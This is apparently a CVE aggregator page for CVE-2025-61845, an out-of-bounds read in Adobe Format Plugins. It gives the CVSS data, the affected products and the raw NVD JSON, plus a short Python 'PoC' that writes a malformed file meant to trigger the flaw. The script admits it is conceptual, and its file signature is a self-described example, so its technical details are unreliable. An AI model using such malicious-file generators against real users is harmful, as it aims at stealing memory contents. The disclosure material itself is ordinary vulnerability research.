Security Vulnerability Report
中文
CVE-2025-61845 CVSS 5.5 MEDIUM

CVE-2025-61845

Published: 2025-11-11 19:15:37
Last Modified: 2025-11-13 15:18:25
Source: [email protected]

Description

Format Plugins versions 1.1.1 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:format_plugins:-:*:*:*:*:*:*:* - VULNERABLE
Adobe Format Plugins <= 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-61845 PoC - Adobe Format Plugins Out-of-bounds Read Note: This is a conceptual PoC demonstrating the vulnerability pattern. Actual exploitation requires specific file format crafting. """ import struct import os def create_malicious_format_plugin(output_path): """ Generate a malicious Format Plugin file to trigger OOB read. This PoC creates a minimal malformed file structure. """ # Format Plugin magic bytes (example) header = b'FPGB' # Format Plugin signature # Malformed header designed to trigger OOB read # Version field manipulation version = b'\x01\x01\x01' # Version 1.1.1 # Crafted size field that may cause buffer overflow # when parsed by vulnerable code size_field = struct.pack('<I', 0xFFFFFFFF) # Large size value # Malformed data block data_block = b'A' * 1024 + b'\xDE\xAD\xBE\xEF' # File structure malicious_content = header + version + size_field + data_block with open(output_path, 'wb') as f: f.write(malicious_content) print(f"[+] Malicious file created: {output_path}") print(f"[+] File size: {len(malicious_content)} bytes") print("[*] This file may trigger OOB read in vulnerable Adobe Format Plugins") print("[*] User interaction required: victim must open this file") def main(): output_file = "CVE-2025-61845_malicious.fp" create_malicious_format_plugin(output_file) print("\n[!] Disclaimer: This PoC is for educational and security research purposes only.") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61845", "sourceIdentifier": "[email protected]", "published": "2025-11-11T19:15:36.543", "lastModified": "2025-11-13T15:18:25.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Format Plugins versions 1.1.1 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:format_plugins:-:*:*:*:*:*:*:*", "matchCriteriaId": "9FE89744-A347-4449-8733-D54CA0E25723"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/formatplugins/apsb25-114.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.